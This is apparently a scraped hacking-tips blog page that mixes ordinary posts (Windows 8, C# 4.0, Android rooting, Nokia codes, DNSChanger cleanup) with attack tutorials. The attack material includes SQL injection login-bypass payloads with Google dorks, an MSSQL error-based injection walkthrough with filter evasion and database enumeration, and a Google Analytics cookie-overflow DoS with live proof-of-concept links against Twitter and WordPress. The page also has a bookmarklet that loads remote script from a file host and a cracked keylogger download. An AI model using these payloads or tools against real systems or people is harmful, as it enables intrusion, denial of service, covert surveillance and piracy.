Add all your facebook friends to a group in one click.

Now you can add all your facebook friends to a group by
preparing a script using following method.All it needs is group id & a web hosting site which u registered in.

Step1:Find group id.

'10736816604104' this is the group id in above link.If the group id is not in numerical form open group,right click on report group & open link in new tab. 

 

Here u can see the group id which is equal to cid '10736816604104' which is numerical.

This group id number will be used in script.

Step 2: Download sample script & edit.

http://www.ziddu.com/download/18202212/NewTextDocument.txt.html

download the script,open in notepad & find the value '10736816604104' and replace it with the group id which u want to add & save the file.

step 3: Upload file in a web hosting site.

Use any web hosting site to upload script & execute.I use http://www.my3gb.com/ after upload a link is created for the file.
 

Example: http://hnk007.my3gb.com/file1.txt

step 4: Use script.

the created link should place in the following script at src='http://techtipsandtricks.my3gb.com/file1.txt'.

javascript:(function(){document.body.appendChild(document.createElement('script')).src='http://hnk007.my3gb.com/file1.txt';})();

now copy above script,open group and enter in address bar(Only mozilla firefox browser) and all your friends will be added & shows number of frnds added to group.

In other browsers including firefox create new bookmark with script in location.After creating bookmark open the group & click the bookmark which has the script of that group.Wait few seconds This will start adding your friends in that Group.

Read More

SQL injection bypass the login form

In this tutorial I will be explaining What is SQL(Its structure), what is SQL injection? how to perform the attack? and how to make your website safe from such kinds of attacks. Before you read any article on sql injection I recommend you to read this first. In this tutorial I will be using MySQL and PHP. I have chosen PHP since it is most widely used language and and in most of the cases MySQL is used as database with PHP. PHP is a web scripting language like ASP, JSP, CGI....You need not learn this attack in every language, the concept of attack remains same for all the languages.

Basics of SQL:

The structure of SQL is divided into:

SQL server-> Databases->Tables-> Columns and Rows.

Sql server: is an application which runs on server side of the application and serves the request as per the command given in client side.

Database: This is a kind of container where particular applications related tables are kept.

Tables: It stores the data in the form of rows and columns.

SQL Injection: Introduction

It is the most widely used technique of hacking since most of the websites today maintain database. SQL Injection is a code(sql) injection technique because of the improper filtration of users input. Lets see a basic injection attack:


Bypassing the login form:
Lets consider a login form login.php

if (isset($_POST['submit']))
{
$username=$_POST['username'];
$password=$_POST['pass']

$check=mysql_query("SELECT * FROM member WHERE username = ' $username' and password=$password");
$check2 = mysql_num_rows($check);

if ($check2 == 0)
     echo "login failed";
else
header("location: members.php);
}
else
{

<form action="login.php" method="post" name="login"> 

<h1>USERLOGIN</h1><br/>

Username:<input type="text" name="username"> 

<br/><br/>

Password:
<input type="password" name="pass"> <input type="submit" name="submit" value="Login"> </form> 


This is not the exact login form just to give you a feel how exactly login form works i have written this code. Just focus on the dark shaded portions of the code, as you can see the login details is sent via "post" method as soon as the submit button is clicked, after clicking the submit button the PHP code will run as "isset" condition is true. Now lets see what happens in the background, the select function tries to fetch the details from the "member" table by comparing the username and password sent from to the username and password inside the member table. Clearly the code which I have written is vulnerable, lets see how?
Consider a situation I have given input something like below:
Username: ' or 'a'='a'
Password: ' or 'a'='a'
Now lets see what happens in the background i.e. in select staement:
select * from member where username=' ' or 'a'='a' and password=' ' or 'a'='a'
Now if you see carefully the two shaded portions, they both results "true". That means our username and password is accepted.
Some other username and password combination which can come handy for SQL injection:


Username: ' or 'a'=a');--
Password: anything



Username: ' or 'a'=a';--
Password: anything

select * from member where username=' ' or 'a'='a');-- and password=' ' or '1'='1'
the command after "--" will act as comment.


Bypassing admin login form. In most of the cases the cases the username for administrator field is "admin" which can be useful when we are injecting code. Lets see:
Username: admin;--
Password: anything



Username: admin);--
Password: anything


Now consider a situation where you know the username and few letters of password, in such cases you can try the following:

Username:' OR EXISTS(SELECT * FROM users WHERE username='admin' AND password LIKE '%a%') AND ''='

password:' OR EXISTS(SELECT * FROM users WHERE username='admin' AND password LIKE '%a%') AND ''='


We can use google dorks to find login page:

Example type: inurl:login or inurl:login.php or inurl:adminlogin or intitle:login in Google search box.

Note: It is not necessary that these combinations will always work. It will depend on the way the script engine is programmed.

Read More

Anonymous operating system

More than 26,000 people have downloaded an operating system which members of the Anonymous hacker group claim to have created.

The software is based on a version of the open-source operating system Linux and comes outfitted with lots of website sniffing and security tools.

The "official" Anonymous group has distanced itself from the software.

In a widely circulated tweet, Anon-ops claimed the operating system was riddled with viruses.

Tool box

The operating system is available via the Source Forge website - a well-known repository for many custom code projects.

The 1.5GB download is based on Ubuntu - one of the most popular versions of the Linux operating system. The software's creators say they put it together for "education purposes to checking the security of web pages (sic)".

It asked people not to use it to destroy webpages.

Soon after the operating system became available, the Anon-ops account on Twitter posted a message saying it was fake and "wrapped in Trojans".

The creators of the OS denied it was infected with viruses adding that, in the world of open-source software, "there were no viruses".

Code check

After downloading and running the software, Rik Ferguson, director of Trend Micro's European security research efforts, said it was "a functional OS with a bunch of pre-installed tools that can be used for things like looking for [database] vulnerabilities or password cracking".

It also included tools such as Tor that can mask a person's online activities. In many ways, he said, it was a pale imitation of a version of Linux known as Back Track that also comes with many security tools already installed.

Mr Ferguson said he was starting work to find out if there were any viruses or booby-traps buried in the code.

Graham Cluley, senior researcher at hi-tech security firm Sophos, wondered who would be tempted to use it.

"Who would want to put their trust in a piece of unknown software written by unknown people on a webpage that they don't know is safe or not?" he asked.

He warned people to be very wary, adding that some hacktivists keen to support the work of Anonymous had been tricked earlier in the year into installing a booby-trapped attack tool.

"Folks would be wise to be very cautious," he said.

Read More

How To Protect Yourself From DNSChanger

In July the Internet Systems Consortium will permanently shut down DNS servers deployed to serve as temporary surrogates for rogue DNS servers shut down as part of Operation Ghost Click, an FBI operation that brought down an Estonian hacker ring last year. If your PC is one of the more than 1 million computers infected that carry DNSChanger you might unknowingly be relying on one of the FBI's temporary servers to access the Internet, and if you don't eliminate DNSChanger from your PC before the FBI pulls the plug on its servers, you'll be left without Internet access. Read on to learn how to discover whether you're infected with DNSChanger, and what you can do to eliminate it from your system.

How to Tell Whether DNSChanger Has Infected Your PC

To figure out whether you've been infected with DNSChanger, just point your Web browser to one of the (admittedly amateur-looking) DNSChanger Check-Up websites that Internet security organizations maintain across the globe. The link above will take you to a DNS Changer Check-Up page in the United States that the DNS Changer Working Group maintains; if you live outside the United States, you can consult the FBI's list of DNSChanger Check-Up websites to find an appropriate service for your region.

Unfortunately, if your router is infected, those websites will think that your PC is infected, even though it may be clean; worse, if your ISP redirects DNS traffic, your PC may appear to be clean even though your DNS settings may have been maliciously altered. If you want to be certain that your PC is free of DNSChanger malware, you need to manually look up the IP addresses of the DNS servers that your PC contacts to resolve domain names when browsing the Web.

To look up which DNS servers your Windows 7 PC is using, open your Start menu and either run the Command Prompt application or type cmd in the Search field. Once you have a command prompt open, type ipconfig /allcompartments /all at the command line and press Enter. A big block of text should appear; scroll through it until you see a line that says 'DNS Servers', and copy down the string(s) of numbers that follow (there may be more than one string here, meaning that your PC accesses more than one DNS server).

It's even easier for Mac OS X users to determine the IP addresses of the DNS servers that their PC uses. Open the Apple menu (usually located in the upper-left corner of the screen) and select System Preferences. Next, click the Network icon to open your Network Settings menu; navigate to Advanced Settings, and copy down the string(s) of numbers listed in the DNS Server box.

Once you know the IP addresses of the DNS servers that your PC is using, head over to the FBI DNSChanger website and enter those addresses into the search box. Press the big blue Check Your DNS button, and the FBI's software will tell you whether your PC is using rogue DNS servers to access the Internet.

What to Do If Your PC Is Infected by DNSChanger

If your PC is infected with DNSChanger, you'll have to do some intensive work to get rid of it. DNSChanger is a powerful rootkit that does more than just alter DNS settings; if you've been infected with DNSChanger, your safest course is to back up your important data, reformat your hard drive(s), and reinstall your operating system.

If you're leery of reformatting your entire PC, you can try rooting out the DNSChanger rootkit with a free rootkit removal utility such as Kaspersky Labs' TDSSKiller. As the name implies, Kaspersky released the program to help PC owners seek and destroy the TDSS rootkit malware, but it also detects and attempts to eliminate DNSChanger and many other forms of rootkits.

If the infected PC is on a network, you'll have to check every other PC on the network for signs of infection, and then check your router's settings to ensure that it isn't affected (DNSChanger is programmed to change router DNS settings automatically, using the default usernames and passwords of most modern routers). To do this, copy down your router's DNS server IP addresses (located in your router's settings menu) and check them against the FBI's IP address database mentioned above. If your router is infected, reset the router and confirm that all network settings are restored to the manufacturer's defaults.

When you're done, repeat the steps outlined above to verify that your PC is no longer infected with DNSChanger. With all traces of this vicious malware eliminated, you should have nothing to fear when the FBI shuts down the ISC's temporary DNS servers in July.

Read More

Windows 8 Beta Download (Consumer Preview)

Windows 8 is the official name for the next version of Microsoft Windows, a series of operating systems produced by Microsoft for use on personal computers, including home and business desktops, laptops, net-books, tablet PCs, and media center PCs. According to unofficial sources, the release date for Windows 8 has been set for October 2012, three years after the release of its predecessor, Windows 7. Windows 8's server counterpart, Windows Server 2012, is in development concurrently with Windows 8. The most recent officially released pre-release version is the Consumer Preview, which was released on February 29, 2012. An almost-complete Release Preview is scheduled for June 5, 2012.

Unlike Windows 7, which was intended to be a more focused, incremental upgrade to the Windows line, Windows 8 has been “re-imagined from the chip-set to the user experience” to connect more with the user. It features the Metro interface that is designed for touchscreen input similar to that in Windows Phone and on the Xbox 360. A version of Windows 8, called Windows RT, also adds support for the ARM processor architecture in addition to the previously supported microprocessors from Intel and AMD.

Downloading Windows 8 Beta

Windows setup (with tools to create an ISO or thumb drive)

http://windows.microsoft.com/en-US/windows-8/download

ISO image (use Disk Image burner or USB tool)

http://windows.microsoft.com/en-US/windows-8/iso

Read More

Keyboard Dancing Led Light Trick

               

 Today i am going to show you an interesting trick which will let your keyboard led light to dance. Basically we will be creating a vb-script to make caps lock, num lock and scroll lock to perform this trick. So lets get started.

     How to do that ?

       1. Open Notepad and copy below codes into it.

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop

        2. Then save this file as led.vbs (.vbs is must)
       3. Open your save file and see your keyboard led blinking like disco lights.


     How to disable blinking Led ?

       1. First open Task Manager [ctrl+alt+del ]
       2. Then Go to process tab.
       3. Select wscript.exe 
       4. Click on End process.

Read More

Google would develop its own processors for their Android devices

Surprising rumor that jumped on the net today. It is said that Google may be developing its own processor and GPU to be used in future Android devices and thus have the search company more control over the hardware.

It seems that Google wants to have hardware with a longer life cycle than usual to not depend on third parties for the development and future of Android, and be Google which also mark the evolution of hardware Apple makes designing their processors ARM for their IOS devices.

No more details are known but this rumor that Google might try to design a processor and GPU free with the minimum requirements to run Google Android and forces developers to optimize applications and games on that processor created by Google for avoid the fragmentation that is occurring now in the processors .

The first device that could make use of processor is Google's brand could be the Nexus that would leave at the end of 2012, which could also be manufactured by Motorola to be now owned by Google and offer a mobile first 100% designed by Google.

Read More

Read and write Indian languages in your Android phone

we know that android is not an Indian developed software hence as usual it will not support Indian languages in almost all phones. But you know we Indians are intelligent enough to do it our self. Here i will tell you how to install and read Indian languages like Gujarati,Hindi,Kannada,Telugu in your android phone.
 
Only you have to do is to copy the .ttf font of your choice to the system/font directory.
But it is not so easy because android will not allow you to access your phones root directory.

But we can do that by the method called ROOTING....!!!!!!!!!!!!!!!
For more Information...
http://www.tech-inside.in/p/android-tricks.html

It is a easy process and at the same time its risk based to it may format or stops your phone

Here is what you have to do

1. Enable USB debugging on your phone by going to Settings –> Applications –> Development. Check the ‘USB Debugging’ option.


2. Make sure you have a SD card inserted and mounted in your phone

3. Download the GingerBreak APPLICATION FROM "" XDA Developers "" and get it onto your phone.

4. Install it by browsing to the GingerBreak APK From your file manager

5. Open GingerBreak application from your menu press the root button.Wait for a few minutes. If there are no problems, the device will reboot itself. (The reboot will take quite some time.)You will see a SuperUser app location along with your system applications after the reboot. Open it and see if it is working.


That's it you have rooted your phone.


INSTALL INDIAN FONTS

1. Download the font you want of any  language (file type: ttf) from the market or from internet.
2. Go to android market from your phone and search and install "font changer" after installing font changer open it
3. It will show that BUSY BOX IS NOT INSTALLED IN YOUR PHONE DO YOU WANT TO DOWNLOAD IT FROM MARKET" PRESS OK AND INSTALL IT (while installing it may say that busy box is already installed in your phone and some .... don't mind it )
4. Now open font changer and go to options->settings->fonts location and give your font location if it in download folder of sd card give it as /sd card/downloads
5. Now you can see your font in font changer press on it and apply.
6. It will ask to reboot press OK
7. Now it will display all fonts includes English
8. You can read Gujarati,HIndi,etc news papers from your default browser
9. Now you can read all websites which is in Gujarati,Hindi languages.

     HERE IS SOME SCREEN SHOTS        

     

                                           
    

Read More

Android's Update to 5.0 (Jelly Bean)

                   

 When most of us are still waiting for our devices to upgrade to the latest version of Android 4.0 (Ice Cream Sandwich) the next version of Google's operating system. But now there are some rumors, That Next version now known as Android 5.0 (Jelly Bean) would be released during the next 4 months of this year and the new version could be expected to be used officially in tabs(notebooks), supporting high end screen resolutions.

Android 5.0 (Jelly Bean) would have support for dual boot with Chrome OS for devices to have both these two operating systems on Google. This would be good for laptops, where would a normal Android operating system and then a quick start with Chrome OS for browsing only.

Read More

Android Hub, the music box from Google

A few days ago I talked about Augmented Reality glasses being developed by Google , we bring you today is also interested in creating an entertainment system for listening to music wirelessly.

The news uncovers the Wall Street Journal, and ensures that the device will be released under the Google brand . It is not known the name of the device, but some sources suggest that will be calledAndroid Hub , and will be in the market later this year.

No further details on the apparatus, we can only guess that Android will be some version of the OS, andGoogle Music (or similar services appear based on the cloud) the department responsible for bringing music to the mysterious black box, one source suggests that speakers have .

Others are speculating that it would be a set top box , without speakers, that would have WiFi connectivity, hardware based on ARM , and a price not exceeding $ 100. Perhaps governed by an operating system of Google TV evolution , would forget the name of one more tug and Android Hub.In this case you will be talking about more than just a device to play music wirelessly.

Finally, it is also spoken tablets and Android smartphones would be the controls of the device, and to share content with it.

We have no waiting for more complete information or leaks, and if you consider it appropriate to share with us what you would like. Surely in the upcoming Google I / O , 27 to June 29, we learn more.

Last year was the Google I / O a demonstration of Tungsten Project, which could be related to the mysterious device discussed in the news (46:45 minutes):

Read More

NOKIA Mobile Hidden Code List

On the main screen on your Nokia Made mobile phone type in:

1. *#06# for checking the IMEI (International Mobile Equipment Identity). 
2. *#7780# reset to factory settings. 
3. *#67705646# This will clear the LCD display(operator logo). 
4. *#0000# To view software version. 
5. *#2820# To show Bluetooth device address. 
6. *#746025625# Sim clock allowed status. 
7. #pw+1234567890+1# Shows if sim have restrictions. 
8. *#92702689# takes you to a secret menu where you may find some of the information below: 
9. Displays Serial Number.
10. Displays the Month and Year of Manufacture
11. Displays (if there) the date where the phone was purchased (MMYY)
12. Displays the date of the last repair – if found (0000)
13. Shows life timer of phone (time passes since last start) 
14. *#3370# Enhanced Full Rate Codec (EFR) activation. Increase signal strength, better signal reception. It also help if u want to use GPRS and the service is not responding or too slow. Phone battery will drain faster though. 
15. *#3370* (EFR) deactivation. Phone will automatically restart. Increase battery life by 30% because phone receives less signal from network. 
16. *#4720# Half Rate Codec activation. 
17. *#4720* Half Rate Codec deactivation. The phone will automatically restart
18. If you forgot wallet code for Nokia S60 phone, use this code reset:*#7370925538#
19. Press *#3925538# to delete the contents and code of wallet. 
20. Unlock service provider: Insert sim, turn phone on and press vol up(arrow keys) for 3 seconds, should say pin code. Press C,then press * message should flash, press * again and 04*pin*pin*pin# \ 
21. *#7328748263373738# resets security code.

Note:- your data in the wallet will be erased. Phone will ask you the lock code. Default lock code is: 12345.

Default security code is 12345

Read More

Top Ranked Free RSS Feed And Blog Directories List Updated 2012

Today i'm going to share the top most ranked free rss feed directories and free blog directories and using them to drive more traffic to your blog. Nowadays there are many ways to promote your websites online,the most considered and the most efficient way to promote your blog to drive serious traffic is by submitting your blog to rss feed directories and popular blog directories.

Signing up to some top performing blog directories and rss feed directories will create quality backlinks and expose your site to many potential visitors and to all search engines. Adding your  blog to these blog directories should result in an increase in site traffic. Though rss feed directories perform better,submitting your site to both rss feed directories and blog directories are equally important.

The upcoming list of directories are very popular directories and has page rank more than 5.Submit your sites to these directories and list your site in the first page of search engines.Driving traffic form rss feed directories and blog directories will be discussed in coming posts.

www.bloglines.com

Page rank 9

www.technorati.com

Page rank 8

Directories With PR 6

www.blogarama.com

www.blawg.com

www.blogcatalog.com

www.blogexplosion.com

www.blogflux.com

www.feeds4all.com

www.feedcat.net

Directories With PR 5

www.chordata.info

www.lsblogs.com  

www.plazoo.com 

Read More

Add Your Signature In Your WebSite

 

If you look at the bottom of the posts in many blogs you will see they finish with a signature.I think the signature looks great and adds a bit of style to the posts.These signatures are very easy to create and add to your blog.You can actually use a small pad to write you signature or pick from one of hundreds of pre-made signatures. I suggest using the pre-made signature, using the pad to create your actual signature is almost imposable.

Create the signature

I'm going to create another signature and walk you trough the steps as i do.

Step 1. Go to My Live Signature and click 'Start Now' you don't need to register.

 

Step 2. You have 2 free options here, choose to use the wizard as i did or be brave and try to write one.

Write in your name as i did below :

Choose the font you want to use from the hundreds they have and click next as below :

Follow the steps to design the signature :

-You now choose the size i choose size 3.
-Select the color, i choose a transparent background.
-Choose the angle slant, I choose 1.

Now your signature is ready, click on 'Want to use this signature?'
 
Now choose 'Generate html code' you will be provided with the code :

This is the code for my new signature :

<a href="http://www.mylivesignature.com" target="_blank"><img src="http://signatures.mylivesignature.com/85996/hnk001/9cd677917441d86e6577582f125779ad.png" border="0" style="border: 0 !important; background: transparent;" /></a>

If you know how to upload the image to Blogger or Photobucket or any image hosting you may want to do that, if not don't worry we will use it as it is.

We only want the image and we don't want the image to be a link back to My live signature so you can remove the code in blue and keep the code in red :
(If your not sure how just change www.mylivesignature.com to the address of your blog)

&lt;a href="http://www.mylivesignature.com" target="_blank"><img src="http://signatures.mylivesignature.com/85996/hnk001/9cd677917441d86e6577582f125779ad.png" border="0" style="border: 0 !important; background: transparent;" />&lt;/a>

Add the signature to your blog

There are two ways to add the signature to your blog the first way is the easiest but it wont be in you previous posts.
The second way adds it directly to your template.

First way to add the signature to your blog.
.
1. Click 'Settings' in your dashboard and then choose 'Formatting' in the top menu as below:






2.Scroll down to 'Post Template' and paste in the code and save:



Now every time you you go to write a post the signature will be already in the post.

Second way to add the signature to your blog.

In your dashboard Click 'Design' > 'Edit Html' and click the 'Expand Widgets Box' :


Find the following code in your blogs html :
(Click 'CTRL and F' for a search bar to find the code)

&lt;data:post.body/>

Paste the code for your signature Directly Below or After &lt;data:post.body/>

Note : If &lt;data:post.body/> is in your template twice place it after the second one.

If you have any trouble or need more help leave a comment below.Now save your template and your signature has been added.

Drop Your Comments And Questions Below.

Read More

Award Key Logger (Full version) for FREE!!

Get one of the Best and award winning key-loggers ''Award Key Logger " for Free ! That too the Full Version!!

Download it here -

http://www.ziddu.com/download/19104518/AwardKeyloggerPro.rar.html

The downloaded folder will have 3 files : 1.Notepad file 2.Installation file 3.An .exe. file.

Install the Installation file and go to the folder where you have installed the logger.(till now logger will have TRIAL version)

Copy the .EXE file from downloaded folder and paste it in the folder where logger has been installed (replace the default .EXE file by the .EXE file which was there in downloaded folder)

Now the logger is full version ! :)

Some of the key features of this logger -

1.Highly efficient .

2.Never misses any log.

3.Screenshots of high quality are taken.

4.Every keystroke is recorded.

Have fun ! :)

Read More

SQL Injection - Bypassing Single Quotes

You found a SQL Injection in a web site, however you need to bypass some security controls and below are the steps taken.

Applicable to Microsoft SQL 200x although the methodology works for every database.

Step 1: We found a SQL Error in the Web App by adding letters to a numeric field:

http://site.com?method=returnSt&zipcode=44444&city=&state=&ratio=019tech

And therefore we got something like:

[SQLServer JDBC Driver][SQLServer]Incorrect syntax near 'tech'.

Every time you get a SQL error in the response, that means your input was executed successfully by the DB Engine and therefore that input field is injectable.

Then we confirm this by adding a SQL command like:

http://site.com?method=returnSt&zipcode=44444&city=&state=&ratio=019 having 1%3d1

And we get a Syntax error confirming our input is being executed as SQL commands:

[SQLServer JDBC Driver][SQLServer]Column 'db.dbo.table.field' is invalid in the HAVING clause because it is not contained in either an aggregate function or the GROUP BY clause.

NOTE: Every App is different so you will need to calculate your own injection string, in my case I do not need to add comments "--" at the end or single quotes (so far).

Step 2: Trying to get DB Engine and Version via (select @@version)

http://site.com?method=returnSt&zipcode=44444&city=&state=&ratio=019 or 1 IN (select @@version)

And we noticed no response is returned!!!!

Escalation 1: Looks like there is some filter in the Server side that is not allowing us to get the information back, so a good trick is to get our information via a SQL Error message, commonly by trying to convert a string into an integer, so we will try to do that:

e.g. select char(@@version)

Whole URL:

http://site.com?method=returnSt&zipcode=44444&city=&state=&ratio=019 or 1 IN (select char(@@version))

The DB will try to convert the string into an integer which is not possible and therefore and error will be generated along with our information:

[SQLServer JDBC Driver][SQLServer]Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.5000.00 (X64) Dec 10 2010 10:38:40 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition (64-bit) on Windows NT 6.0 (Build 6001: Service Pack 1) ' to data type int

From now on in this Pentest we know we will need to do this kind of conversions to get our required information.

Step 3: Lets try to get database names by injecting:

http://site.com?method=returnSt&zipcode=44444&city=&state=&ratio=019 or 1 in (SELECT top 1 NAME FROM master..sysdatabases)

And we get the default one "master" in the SQL error:

[SQLServer JDBC Driver][SQLServer]Conversion failed when converting the nvarchar value 'master' to data type int.

Step 4: Now we can start searching for more databases so we do something like:

http://site.com?method=returnSt&zipcode=44444&city=&state=&ratio=019 or 1 in (SELECT top 1 NAME FROM master..sysdatabases where NAME not like 'master')

BUT we noticed our single quotes are being escaped:

019 or 1 in (SELECT top 1 NAME FROM master..sysdatabases where name not like ''master%'')

Escalation 2: We use CHAR() MSSQL Function to avoid using single quotes so we inject something like:

http://site.com?method=returnSt&zipcode=44444&city=&state=&ratio=019 or 1 in (SELECT top 1 NAME FROM master..sysdatabases where name not like char(109)%2bchar(37)

char(116) = m

%2b = +

char(37) = %

result = name not like CHAR(116)+CHAR(37)

Or in human readable syntax: name not like 'm%'

But when we inject it, we do not get a response again which means a filter in the Server side is detecting this attempts, so here is where your mind need to start thinking how to bypass filters, after some minutes I decided to break the pattern by adding a horizontal tab (ASCII 09 decimal) along with the space: char(109)%2b%09char(37):

http://site.com?method=returnSt&zipcode=44444&city=&state=&ratio=019 or 1 in (SELECT top 1 NAME FROM master..sysdatabases where name not like char(109)%2b%09char(37))

And guess what:

[SQLServer JDBC Driver][SQLServer]Conversion failed when converting the nvarchar value 'tempdb' to data type int.

We got the second default DB which means Game Over! we can dump the whole database and if we are lucky we could escalate it and get a remote shell (out of scope of this article).

We could start getting more data base names by discarding the ones we already got, something like:

where name not like 'master' and name not like 'tempdb' and name not like ..... using above instructions.

The next immediate step would be to start listing the tables from the DB and then the fields from those tables like:

SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'mytable');

Well known references:

1. http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet

2. http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/

Hope this helps.

Read More

New Features in C# 4.0

Visual Studio 2010 is out and we have a new version of C# that also accompanies it. That's C# 4.0 - I have been working on C# from the good old 1.0 or 1.1 version upwards. So whats the new 4.0 version of C# got in store for you. Here's a wrap up of the new features available as part of C# 4.0 release.

keyword Dynamic

There's a new kid in the block, with the introduction of a very a key feature of this release called the dynamic keyword. The keyword dynamic bridges the gap that existed between a dynamically and statically - typed languages. Well, C# can now also be considered a dynamically typed language too. You can easily create dynamic objects on the fly and even have their types determined only at run time. You will simply need to add a new namespace called System.Dynamic, and lo you can create expandable objects and even advanced class wrappers. You can also facilitate interoperability between different languages, including the dynamic ones.

To better understand the use of dynamic keyword, here's an example:

dynamic BankAccount = new ExpandoObject();

BankAccount.Number = "174258733-451269";

BankAccount.HolderName = "Jason S";

BankAccount.Branch = "Bangalore";

Though there are many pros and cons for the use of dynamic keyword and the system performance overheads, it makes like that much more simpler for the developer in the end.

Optional (or Default) Method Parameters

If I rightly remember, VB.net is preferred to C# when porting old projects in ancient langues of VB 5 / 6 or when working on creating COM wrappers since VB.net allows you the use of Optional or Default parameters in methods. C# 4.0 has finally got this feature to make it that much more robust in this area.

You can now easily specify a default value for a parameter within the method declaration in C# 4.0. Also, the consumer of the method can either pass a value or can easily skip the parameter. When the parameter is skipped, the default value declared in the method is passed.

Here's a simple example to explain it:

Method declaration:

public static void GetMoney(int amount = 0) { }

Bot the below Method calls for the above declaration are valid in C# 4.0:

GetMoney(); // 0 is used as amount in the method.

GetMoney(1000);

Named Arguments

Well, here's another relief to the developer. Did you know that in C# 4.0 the order of parameters in a method declaration and also the order of arguments you pass to the method when calling don’t need to match anymore!!. You can now easily provide arguments to a method in any order that you are comfortable with by specifying parameter names with-in the method call. This feature also tremendously improves the readability of one's code.

Here's a simple example of using Named Arguments in C# 4.0

var sample = new List();

sample.InsertRange(collection: new List(), index: 0);

sample.InsertRange(index: 0, collection: new List()); // both ways it'll work now

Covariance and Contravariance

Does the heading sound confusing? Well, the use of variance on generic type parameters in interfaces and delegates is yet another new feature available in C# 4.0. Though, strictly speaking it doesn’t add that much of a new functionality. But it rather makes things work in the first place as you expected them to work. Here is a major advantage that is hidden in the power of C# 4.0 in simple line below. Note: The below code wouldn't have compiled up until C# 4.0 was released:



IEnumerable

Now you have the ability to implicitly convert references for objects instantiated with different type arguments. This makes it that much more simpler and easier to reuse code.

Improved COM Interop Support

As I started this article with the dynamic keyword, then we had the optional parameters and named arguments, did you know that all of this actually enables a significant improvement in working with COM interop. Though all these features have arrived pretty late for the COM Interop world - but it's like late than never is better.

Take a look at my ugly code below:

var excelApp = new Excel.Application();

// . . .

excelApp.get_Range("A1", "B4").AutoFormat(

Excel.XlRangeAutoFormat.xlRangeAutoFormatTable3,

Type.Missing, Type.Missing, Type.Missing,

Type.Missing, Type.Missing, Type.Missing);

I can now simply write it in a few lines as below:

excelApp.Range["A1", "B3"].AutoFormat(

Excel.XlRangeAutoFormat.xlRangeAutoFormatClassic2);

Read More

How to use Google Analytics to DoS a client from some website.

One of those cookies is the referer. This is true for "search result - organic referers", like for example, a Google search. The catch is that the detection on google's service is very bad, and we can fool it to think we are a google search result by doing:

http://google.yourfavoritedomain.com/search?q=search-term

So, you can guess.. if search-term is big enough we can hack the world.

Anyway, there's a catch. You can't set such a big cookie. The limit aparently is 4192 bytes. So.. what you have to do is control 2 cookies.

The other cookie we are going to be using is GASO (Google Analytics Site Overlay), its trigered by the content on
http://yourwebsite.com/page.html#gaso=somevalue

And well, the google analytics code will set a cookie called GASO to somevalue

With both vectors we can now set very big cookies! and with those cookies we can disable access to lot of websites to anyone with just a link (or an iframe if you want to improve the stealthness of the attack).

Twitter PoC:
http://google.sirdarckcat.net/?v=http://twitter.com/

If you use twitter over SSL...
http://google.sirdarckcat.net/?v=https://twitter.com/

To lock you out of all wordpress.com blogs:
http://google.sirdarckcat.net/?v=http://rofl.wordpress.com/
Try your favorite Google Analytics powered websites :D

References:
http://httpd.apache.org/docs/2.0/mod/core.html#limitrequestfieldsize
http://httpd.apache.org/docs/1.3/mod/core.html#limitrequestfieldsize
http://royal.pingdom.com/2008/05/28/google-analytics-dominate-the-top-500-websites/

Examples:
GASO limit
#gaso=dagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapond